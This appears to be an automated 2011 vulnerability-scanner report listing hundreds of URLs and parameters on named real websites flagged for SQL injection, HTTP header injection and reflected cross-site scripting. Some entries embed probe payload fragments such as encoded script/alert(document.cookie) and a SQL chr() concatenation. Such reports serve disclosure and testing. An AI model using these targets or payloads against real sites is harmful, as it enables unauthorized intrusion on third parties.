DORK, Report, XSS, SQL Injection, HTTPi, Response Splitting

The Daily DORK Report for Feb. 2, 2011 | CloudSCan Vulnerability Crawler

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:27:43 CST 2011.

DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://amch.questionmarket.com/adsc/d647401/46/799689/randm.js [REST URL parameter 1]

1.2. http://amch.questionmarket.com/adsc/d724324/16/752264/randm.js [REST URL parameter 5]

1.3. http://amch.questionmarket.com/adsc/d724324/27/726813/randm.js [REST URL parameter 1]

1.4. http://amch.questionmarket.com/adsc/d724324/27/752289/randm.js [REST URL parameter 3]

1.5. http://amch.questionmarket.com/adsc/d747416/11/748729/randm.js [REST URL parameter 4]

1.6. http://amch.questionmarket.com/adsc/d763769/11/770950/randm.js [REST URL parameter 1]

1.7. http://amch.questionmarket.com/adsc/d793570/3/793591/randm.js [REST URL parameter 3]

1.8. http://amch.questionmarket.com/adsc/d798609/10/805369/randm.js [REST URL parameter 1]

1.9. http://blog.supermedia.com/archives/tips/ [REST URL parameter 2]

1.10. http://docs.jquery.com/UI/Dialog [name of an arbitrarily supplied request parameter]

1.11. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]

1.12. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]

1.13. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 2]

1.14. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 5]

1.15. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6]

1.16. http://www.supermedia.com/support/contact-us/ [CstrStatus cookie]

1.17. https://www.supermedia.com/spportal/indexLogin.do [s_cc cookie]

1.18. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]

1.19. https://www.supermedia.com/spportal/spportalFlow.do(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C' [s_sq cookie]

1.20. http://www.youtube.com/ [Referer HTTP header]

1.21. http://www.youtube.com/ [hl parameter]

1.22. http://www.youtube.com/ [name of an arbitrarily supplied request parameter]

1.23. http://www8.tucows.com/delivery/afr.php [OAVARS[aed03704] cookie]

1.24. http://www8.tucows.com/delivery/afr.php [n parameter]

1.25. http://www8.tucows.com/delivery/afr.php [n parameter]

2. HTTP header injection

2.1. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

2.2. http://102.xg4ken.com/media/redir.php [url[] parameter]

2.3. http://2e76.v.fwmrm.net/ad/l/1 [cr parameter]

2.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

2.5. http://ad.doubleclick.net/ad/N3340.scanscout.com/B4852812.30 [REST URL parameter 1]

2.6. http://ad.doubleclick.net/adi/N3671.TMP/B5159652.23 [REST URL parameter 1]

2.7. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

2.8. http://ad.doubleclick.net/adi/lb.buzzillions/ [REST URL parameter 1]

2.9. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]

3. Cross-site scripting (reflected)

3.1. http://abc.go.com/vp2/d/deeplink [REST URL parameter 3]

3.2. http://ads.adap.tv/beacons [callback parameter]

3.3. http://ads.gmodules.com/gadgets/ifr [url parameter]

3.4. http://advertise.tucows.com/ [name of an arbitrarily supplied request parameter]

3.5. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

3.6. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

3.7. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

3.8. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

3.9. http://advertise.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

3.10. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 1]

3.11. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 2]

3.12. http://advertise.tucows.com/includes/js/aalib.js [REST URL parameter 3]

3.13. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 1]

3.14. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 2]

3.15. http://advertise.tucows.com/includes/js/ajaxlib.js [REST URL parameter 3]

3.16. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 1]

3.17. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 2]

3.18. http://advertise.tucows.com/includes/js/show_layer.js [REST URL parameter 3]

3.19. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 1]

3.20. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 2]

3.21. http://advertise.tucows.com/includes/js/signupin.js [REST URL parameter 3]

3.22. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 1]

3.23. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 2]

3.24. http://advertise.tucows.com/includes/js/x_core.js [REST URL parameter 3]

3.25. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 1]

3.26. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]

3.27. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]

3.28. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 1]

3.29. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 2]

3.30. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 3]

3.31. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

3.32. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

3.33. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

3.34. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

3.35. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

3.36. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

3.37. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

3.38. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

3.39. http://blog.supermedia.com/comment_html.php [cid parameter]

3.40. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]

3.41. http://boardreader.com/index.php [name of an arbitrarily supplied request parameter]

3.42. http://boardreader.com/my/signup.html [name of an arbitrarily supplied request parameter]

3.43. http://boardreader.com/pop/articles/-/-/7.html [name of an arbitrarily supplied request parameter]

3.44. http://boardreader.com/pop/films/-/-/3.html [name of an arbitrarily supplied request parameter]

3.45. http://boardreader.com/pop/instructions/-/-/7.html [name of an arbitrarily supplied request parameter]

3.46. http://boardreader.com/pop/news/-/-/3.html [name of an arbitrarily supplied request parameter]

3.47. http://boardreader.com/pop/releases/-/-/3.html [name of an arbitrarily supplied request parameter]

3.48. http://boardreader.com/pop/sites.html [name of an arbitrarily supplied request parameter]

3.49. http://boardreader.com/pop/videos/-/-/3.html [name of an arbitrarily supplied request parameter]

3.50. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

3.51. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]

3.52. http://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]

3.53. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [rdid parameter]

3.54. https://cbi.boldchat.com/aid/3760177095415339810/bc.cbhs [wdid parameter]

3.55. http://clicktoverify.truste.com/pvr.php [name of an arbitrarily supplied request parameter]

3.56. http://clicktoverify.truste.com/pvr.php [sealid parameter]

3.57. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

3.58. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]

3.59. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]

3.60. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]

3.61. http://digg.com/submit [REST URL parameter 1]

3.62. http://ds.addthis.com/red/psi/sites/www.ip-adress.com/p.json [callback parameter]

3.63. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

3.64. http://ll-appserver.veoh.com/styles/veoh-ie6.css [version parameter]

3.65. http://ll-appserver.veoh.com/styles/veoh.css [version parameter]

3.66. http://managedq.com/search.php [name of an arbitrarily supplied request parameter]

3.67. http://managedq.com/search.php [q parameter]

3.68. http://my.supermedia.com/customersupport/index.jsp [name of an arbitrarily supplied request parameter]

3.69. http://my.supermedia.com/directoryoptout [name of an arbitrarily supplied request parameter]

3.70. http://my.supermedia.com/directoryoptout/ [37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde parameter]

3.71. http://my.supermedia.com/directoryoptout/ [name of an arbitrarily supplied request parameter]

3.72. http://my.supermedia.com/directoryoptout/confirm.do [name of an arbitrarily supplied request parameter]

3.73. http://my.supermedia.com/directoryoptout/index.jsp [37fe3%22%3E%3Cscript%3Ealert(document.cookie parameter]

3.74. http://my.supermedia.com/directoryoptout/index.jsp [name of an arbitrarily supplied request parameter]

3.75. http://trc.taboolasyndication.com/dispatch/ [format parameter]

3.76. http://trc.taboolasyndication.com/dispatch/ [item-type parameter]

3.77. http://trc.taboolasyndication.com/dispatch/ [list-id parameter]

3.78. http://trc.taboolasyndication.com/dispatch/ [publisher parameter]

3.79. http://www.bizfind.us/ [name of an arbitrarily supplied request parameter]

3.80. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [name of an arbitrarily supplied request parameter]

3.81. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 6]

3.82. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]

3.83. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [name of an arbitrarily supplied request parameter]

3.84. http://www.butterscotch.com/ [name of an arbitrarily supplied request parameter]

3.85. http://www.butterscotch.com/ [src parameter]

3.86. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

3.87. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

3.88. http://www.butterscotch.com/shows/A-List [REST URL parameter 2]

3.89. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

3.90. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

3.91. http://www.butterscotch.com/shows/AT [REST URL parameter 2]

3.92. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

3.93. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

3.94. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]

3.95. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

3.96. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

3.97. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]

3.98. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

3.99. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

3.100. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]

3.101. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

3.102. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

3.103. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]

3.104. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

3.105. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

3.106. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]

3.107. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]

3.108. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]

3.109. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

3.110. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

3.111. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

3.112. http://www.ip-adress.com/whois/smartdevil.com/x22 [REST URL parameter 2]

3.113. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]

3.114. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]

3.115. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]

3.116. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 3]

3.117. http://www.kminek.pl/bsdlicense.txt [REST URL parameter 1]

3.118. http://www.kminek.pl/kminek-css-1271705349.css [REST URL parameter 1]

3.119. http://www.kminek.pl/kminek-js-1249725108.js [REST URL parameter 1]

3.120. http://www.kminek.pl/lab/yetii/ [REST URL parameter 2]

3.121. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [REST URL parameter 1]

3.122. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]

3.123. http://www.lightinthebox.com/wholesale-Shower-Faucets_c2863 [name of an arbitrarily supplied request parameter]

3.124. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]

3.125. http://www.quantcast.com/p-aasG6JkxVvmNA [REST URL parameter 1]

3.126. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]

3.127. http://www.smartdraw.com/buy/x22 [REST URL parameter 1]

3.128. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]

3.129. http://www.smartdraw.com/buy/x22 [REST URL parameter 2]

3.130. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]

3.131. http://www.smartdraw.com/buy/x22 [name of an arbitrarily supplied request parameter]

3.132. http://www.smartdraw.com/downloads [REST URL parameter 1]

3.133. http://www.smartdraw.com/downloads [REST URL parameter 1]

3.134. http://www.smartdraw.com/downloads [REST URL parameter 1]

3.135. http://www.smartdraw.com/downloads [REST URL parameter 1]

3.136. http://www.smartdraw.com/downloads [id parameter]

3.137. http://www.smartdraw.com/downloads [id parameter]

3.138. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]

3.139. http://www.smartdraw.com/downloads [name of an arbitrarily supplied request parameter]

3.140. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]

3.141. http://www.smartdraw.com/downloads/x22 [REST URL parameter 1]

3.142. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]

3.143. http://www.smartdraw.com/downloads/x22 [REST URL parameter 2]

3.144. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]

3.145. http://www.smartdraw.com/downloads/x22 [name of an arbitrarily supplied request parameter]

3.146. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]

3.147. http://www.smartdraw.com/examples/charts/x22 [REST URL parameter 1]

3.148. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

3.149. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

3.150. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

3.151. http://www.smartdraw.com/product/reviews [REST URL parameter 1]

3.152. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

3.153. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

3.154. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

3.155. http://www.smartdraw.com/product/reviews [REST URL parameter 2]

3.156. http://www.smartdraw.com/product/reviews [id parameter]

3.157. http://www.smartdraw.com/product/reviews [id parameter]

3.158. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]

3.159. http://www.smartdraw.com/product/reviews [name of an arbitrarily supplied request parameter]

3.160. http://www.smartdraw.com/product/x22 [REST URL parameter 1]

3.161. http://www.smartdraw.com/product/x22 [REST URL parameter 1]

3.162. http://www.smartdraw.com/product/x22 [REST URL parameter 2]

3.163. http://www.smartdraw.com/product/x22 [REST URL parameter 2]

3.164. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]

3.165. http://www.smartdraw.com/product/x22 [name of an arbitrarily supplied request parameter]

3.166. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]

3.167. http://www.smartdraw.com/specials/diagram.asp/x22 [REST URL parameter 2]

3.168. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]

3.169. http://www.smartdraw.com/specials/diagram.asp/x22 [name of an arbitrarily supplied request parameter]

3.170. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]

3.171. http://www.smartdraw.com/specials/floorplans.asp/x22 [REST URL parameter 2]

3.172. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]

3.173. http://www.smartdraw.com/specials/floorplans.asp/x22 [name of an arbitrarily supplied request parameter]

3.174. http://www.smartdraw.com/specials/flowchart.asp/x22 [REST URL parameter 2]

3.175. http://www.smartdraw.com/specials/flowchart.asp/x22 [REST URL parameter 2]

3.176. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]

3.177. http://www.smartdraw.com/specials/flowchart.asp/x22 [name of an arbitrarily supplied request parameter]

3.178. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]

3.179. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]

3.180. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]

3.181. http://www.smartdraw.com/specials/sd/buy-sd.htm [REST URL parameter 3]

3.182. http://www.smartdraw.com/specials/sd/buy-sd.htm [id parameter]

3.183. http://www.smartdraw.com/specials/sd/buy-sd.htm [id parameter]

3.184. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]

3.185. http://www.smartdraw.com/specials/sd/buy-sd.htm [name of an arbitrarily supplied request parameter]

3.186. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]

3.187. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]

3.188. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]

3.189. http://www.smartdraw.com/specials/smartdraw.asp [REST URL parameter 2]

3.190. http://www.smartdraw.com/specials/smartdraw.asp [id parameter]

3.191. http://www.smartdraw.com/specials/smartdraw.asp [id parameter]

3.192. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]

3.193. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]

3.194. http://www.smartdraw.com/support/x22 [REST URL parameter 1]

3.195. http://www.smartdraw.com/support/x22 [REST URL parameter 1]

3.196. http://www.smartdraw.com/support/x22 [REST URL parameter 2]

3.197. http://www.smartdraw.com/support/x22 [REST URL parameter 2]

3.198. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]

3.199. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]

3.200. http://www.smartdraw.com/training/x22 [REST URL parameter 1]

3.201. http://www.smartdraw.com/training/x22 [REST URL parameter 1]

3.202. http://www.smartdraw.com/training/x22 [REST URL parameter 2]

3.203. http://www.smartdraw.com/training/x22 [REST URL parameter 2]

3.204. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]

3.205. http://www.smartdraw.com/training/x22 [name of an arbitrarily supplied request parameter]

3.206. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]

3.207. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]

3.208. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]

3.209. http://www.smartdraw.com/videos/demo/index.htm [REST URL parameter 3]

3.210. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 1]

3.211. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 1]

3.212. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 2]

3.213. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 2]

3.214. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 3]

3.215. http://www.smartdraw.com/videos/demo/x22 [REST URL parameter 3]

3.216. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]

3.217. http://www.smartdraw.com/videos/demo/x22 [name of an arbitrarily supplied request parameter]

3.218. http://www.smartdraw.com/x22 [REST URL parameter 1]

3.219. http://www.smartdraw.com/x22 [REST URL parameter 1]

3.220. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]

3.221. http://www.smartdraw.com/x22 [name of an arbitrarily supplied request parameter]

3.222. http://www.stumbleupon.com/submit [url parameter]

3.223. https://www.supermedia.com/spportal/spportalFlow.do ['"--> parameter]

3.224. https://www.supermedia.com/spportal/spportalFlow.do [_flowExecutionKey parameter]

3.225. https://www.supermedia.com/spportal/spportalFlow.do [_flowExecutionKey parameter]

3.226. https://www.supermedia.com/spportal/spportalFlow.do [_flowId parameter]

3.227. https://www.supermedia.com/spportal/spportalFlow.do [name of an arbitrarily supplied request parameter]

3.228. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

3.229. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

3.230. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

3.231. http://www.superpages.com/inc/social/soc.php [cg parameter]

3.232. http://www.tucows.com/ [name of an arbitrarily supplied request parameter]

3.233. http://www.tucows.com/about.html [REST URL parameter 1]

3.234. http://www.tucows.com/about.html [name of an arbitrarily supplied request parameter]

3.235. http://www.tucows.com/advertise.html [REST URL parameter 1]

3.236. http://www.tucows.com/advertise.html [name of an arbitrarily supplied request parameter]

3.237. http://www.tucows.com/affiliate/index.html [REST URL parameter 1]

3.238. http://www.tucows.com/affiliate/index.html [REST URL parameter 2]

3.239. http://www.tucows.com/affiliate/index.html [name of an arbitrarily supplied request parameter]

3.240. http://www.tucows.com/author_ratings.html [REST URL parameter 1]

3.241. http://www.tucows.com/author_ratings.html [name of an arbitrarily supplied request parameter]

3.242. http://www.tucows.com/contact.html [REST URL parameter 1]

3.243. http://www.tucows.com/contact.html [name of an arbitrarily supplied request parameter]

3.244. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 1]

3.245. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 2]

3.246. http://www.tucows.com/images/newassets/contact.html [REST URL parameter 3]

3.247. http://www.tucows.com/images/newassets/contact.html [name of an arbitrarily supplied request parameter]

3.248. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]

3.249. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]

3.250. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]

3.251. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]

3.252. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]

3.253. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 6]

3.254. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [REST URL parameter 7]

3.255. http://www.tucows.com/images/newassets/includes/corpbar/cb3.0/css/style.css [name of an arbitrarily supplied request parameter]

3.256. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 1]

3.257. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 2]

3.258. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 3]

3.259. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 4]

3.260. http://www.tucows.com/images/newassets/includes/js/aalib.js [REST URL parameter 5]

3.261. http://www.tucows.com/images/newassets/includes/js/aalib.js [name of an arbitrarily supplied request parameter]

3.262. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 1]

3.263. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 2]

3.264. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 3]

3.265. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 4]

3.266. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [REST URL parameter 5]

3.267. http://www.tucows.com/images/newassets/includes/js/ajaxlib.js [name of an arbitrarily supplied request parameter]

3.268. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 1]

3.269. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 2]

3.270. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 3]

3.271. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 4]

3.272. http://www.tucows.com/images/newassets/includes/js/show_layer.js [REST URL parameter 5]

3.273. http://www.tucows.com/images/newassets/includes/js/show_layer.js [name of an arbitrarily supplied request parameter]

3.274. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 1]

3.275. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 2]

3.276. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 3]

3.277. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 4]

3.278. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 5]

3.279. http://www.tucows.com/images/newassets/includes/js/signupin.js [name of an arbitrarily supplied request parameter]

3.280. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 1]

3.281. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 2]

3.282. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 3]

3.283. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 4]

3.284. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 5]

3.285. http://www.tucows.com/images/newassets/includes/js/x_core.js [name of an arbitrarily supplied request parameter]

3.286. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 1]

3.287. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 2]

3.288. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 3]

3.289. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 4]

3.290. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 5]

3.291. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [name of an arbitrarily supplied request parameter]

3.292. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 1]

3.293. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 2]

3.294. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 3]

3.295. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 4]

3.296. http://www.tucows.com/images/newassets/includes/js/yetii.js [REST URL parameter 5]

3.297. http://www.tucows.com/images/newassets/includes/js/yetii.js [name of an arbitrarily supplied request parameter]

3.298. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 1]

3.299. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 2]

3.300. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 3]

3.301. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 4]

3.302. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 5]

3.303. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [REST URL parameter 6]

3.304. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css [name of an arbitrarily supplied request parameter]

3.305. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]

3.306. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 2]

3.307. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 3]

3.308. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 4]

3.309. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 5]

3.310. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [REST URL parameter 6]

3.311. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/styles.css [name of an arbitrarily supplied request parameter]

3.312. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 1]

3.313. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 2]

3.314. http://www.tucows.com/images/newassets/javascript:void(null) [REST URL parameter 3]

3.315. http://www.tucows.com/images/newassets/javascript:void(null) [name of an arbitrarily supplied request parameter]

3.316. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 1]

3.317. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 2]

3.318. http://www.tucows.com/images/newassets/lostpass.html [REST URL parameter 3]

3.319. http://www.tucows.com/images/newassets/lostpass.html [name of an arbitrarily supplied request parameter]

3.320. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 1]

3.321. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 2]

3.322. http://www.tucows.com/images/newassets/privacy.html [REST URL parameter 3]

3.323. http://www.tucows.com/images/newassets/privacy.html [name of an arbitrarily supplied request parameter]

3.324. http://www.tucows.com/images/newassets/safesearchtoggle.html [REST URL parameter 1]

